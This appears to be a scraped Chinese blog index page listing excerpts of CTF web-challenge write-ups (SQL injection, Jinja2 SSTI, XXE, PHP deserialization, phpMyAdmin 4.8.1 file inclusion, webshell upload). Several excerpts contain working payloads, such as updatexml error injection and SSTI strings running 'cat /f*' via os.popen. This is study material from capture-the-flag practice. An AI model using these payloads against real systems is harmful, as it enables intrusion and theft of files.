自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(18)
  • 收藏
  • 关注

原创 [RCTF2015]EasySQL

[RCTF2015]EasySQL1、打开页面一看,有注册,有登录。先注册个号登录一下。2、登录之后,点自己的用户名,发现可以修改密码。盲猜二次注入。3、试了一下amind"#,密码改是改了,但没有什么有用的信息。4、fuzz一下,发现过滤了这些东西5、可以尝试报错注入username=admin" || (updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(

2022-03-23 14:30:01 4048

原创 [CISCN2019 总决赛 Day2 Web1]Easyweb

[CISCN2019 总决赛 Day2 Web1]Easyweb1、打开页面,试了试,xml,sql注入都没试出来。查看robots.txt文件,发现再查看源码,发现了image.php,试一下image.php.bak泄露<?phpinclude "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes($id);

2022-03-23 14:27:30 4676

原创 ctfshow--SSTI

ctfshow–SSTI361、{{7*‘7’}}回显是7777777,判断是jinjia2模板。{{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}}''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。362、在__builtin__中有众多的可用函数,包括eval1:?name={{ur

2022-03-15 14:27:55 567

原创 ctfshow--反序列化

ctfshow反序列化篇(255-271)255、class ctfShowUser{ public $isvip=true;}$a=new ctfShowUser();echo urlencode(serialize($a));get传两个参数username=xxxxxx&password=xxxxxxburp抓包,cookie传参user(分号在cookie中不会被正确的上传到服务器,所以需要url编码):256、<?phpClass ctfShowUse

2022-03-15 14:26:57 3123

原创 ctfshow--xxe

ctfshow–xxe有回显<?phperror_reporting(0);libxml_disable_entity_loader(false);//file_get_contents("php://input"),我么需要post我们的payload$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ //DOMDocument,表示整个HTML或XML文档;作为文档树的根 $dom =

2022-03-15 14:23:28 2602

原创 [GYCTF2020]FlaskApp

[GYCTF2020]FlaskApp看到题目,发现是Flask,猜测是SSTI模板注入,先尝试一下:现在加密栏输入{{7+7}},复制base64编码,然后在解密栏输入,得到:尝试构造payload:{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}发现有waf:在解密栏随便输入一些内容,发现抱错会出现一些信息尝试构造payload,打开app.py{{

2022-03-15 14:21:22 345

原创 [SUCTF 2019]Pythonginx

[SUCTF 2019][email protected]('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(u

2022-03-15 14:19:52 5444

原创 [MRCTF2020]Ezpop

[MRCTF2020]Ezpopappend<-__incoke<-get<-__toString__wakeup() //执行unserialize()时,先会调用这个函数__sleep() //执行serialize()时,先会调用这个函数__destruct() //对象被销毁时触发__call() //在对象上下文中调用不可访问的方法时触发__callStatic() //在静态上下文中调用不可访问的方法时触发__get() //用于从不可访问的属性读取数据或者不存在

2022-03-15 14:15:47 92

原创 [WesternCTF2018]shrine

[WesternCTF2018]shrineimport flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s):

2022-03-15 14:08:47 988 1

原创 [De1CTF 2019]SSRF Me

python格式美化一下from flaskimport Flask from flaskimport requestimport socketimport hashlibimport urllibimport sysimport osimport json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_key = os.urandom(16) class Task:

2022-03-15 14:06:54 125

原创 [0CTF 2016]piapiapia

[0CTF 2016]piapiapia代码审计经验不足,以下是我做题的流程:1、进入页面发现登录框,没有注册。先尝试了一下sql注入,发现行不通。之前做过源码泄露的题,试了一下www.zip,就出源码了。2、开始代码审计在profile.php文件里发现了unserialize()和file_get_contents()两个函数,一个是反序列化的标识,一个是查看文件内容的危险函数,而如果我们把$profile[photo]改为config.php,就可以查看flag。[外链图片转存失败,源站

2022-03-15 14:02:44 1571

原创 [GWCTF 2019]我有一个数据库(每日一题)

[GWCTF 2019]我有一个数据库(每日一题)1,打开页面,什么也没有发现,扫个目录看看,发现phpmyadmin2,访问phpmyadmin,版本是4.8.1,这个版本有个任意文件包含的漏洞。漏洞复现地址:https://www.cnblogs.com/leixiao-/p/10265150.html3,payload:?target=db_sql.php%253f/../../../../../../flagps:今天水了一篇(bushi...

2021-09-10 21:16:41 123

原创 [BJDCTF2020]The mystery of ip (每日一题)

[BJDCTF2020]The mystery of ip (每日一题)1,打开网页,看到了flag的标识,点进去发现:2,想起伪造ip,尝试抓包,伪造ip,发现没什么变化3,尝试改成本地ip,发现ip值变化,也许可以在这里做文章4,将ip改为{7*8},被当成语句执行了5,尝试用系统命令{system(“ls”)},发现可以执行,构造{system(“cat /flag”)},得到flag...

2021-09-09 11:53:25 264

原创 [强网杯 2019]高明的黑客(每日一题)

[强网杯 2019]高明的黑客(每日一题)1,打开网页,发现提示,下载文件2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)]3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学

2021-09-07 21:01:46 924

原创 [GXYCTF2019]禁止套娃(每日一题)

[GXYCTF2019]禁止套娃知识点.git源码泄露无参数RCE,参考文章:https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#解题思路1.打开题目,啥也没有,F12也啥都没有,用wscan扫一下目录看看,发现.git返回403,猜测是git源码泄露。2.使用GitHack下载源码[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xecnj2F2-1630909930492)(https://

2021-09-06 14:33:18 563 1

转载 [RoarCTF 2019]Easy Java

[RoarCTF 2019]Easy Java前言昨天发布了我的第一篇博客,里面的内容有很多都是根据其他师傅的博客来写的。发布的时候,需要选择原创还是转载,我感觉自己也参与了一小部分,就填成了原创。所以决定,以后要是遇到一篇文章能把我讲懂的,我就选转载(比如这篇);如果我翻阅了好几篇wp才看懂,然后缝合的,就原创(心虚)。转载文章:https://www.cnblogs.com/karsa/p/13130130.html前置知识WEB-INF/web.xml泄露WEB-INF/web.xml

2021-09-05 13:01:39 164

原创 [GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload1,先上传个php文件试试,提示后缀名不能有ph2,上传个.htaccess文件试试,提示上传类型也太露骨了吧.hatccess文件内容:SetHandler application/x-httpd-php3,换个文件类型,换成image/jpeg,上传成功!接下来只需要上传一个带有一句话木马的png/jpg文件就行。(。。还有)对文件内容进行了过滤,猜测过滤了<?6,可以使用<script language="php"&g

2021-09-04 14:21:36 157

原创 [BUUCTF 2018]Online Tool

[BUUCTF 2018]Online Tool前言我到底什么时候才能学会看知识点写题,而不是看题解写题。(三重套娃)今天做题日常看wp,看到了两位师傅写的本道题的题解,经过反复观看才勉强看懂,下面是两位师傅的链接:(基本全程抄(bushi))​ https://blog.csdn.net/weixin_44077544/article/details/102835099​ https://blog.csdn.net/TM_1024/article/details/107393796?utm_me

2021-09-04 14:07:05 130

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除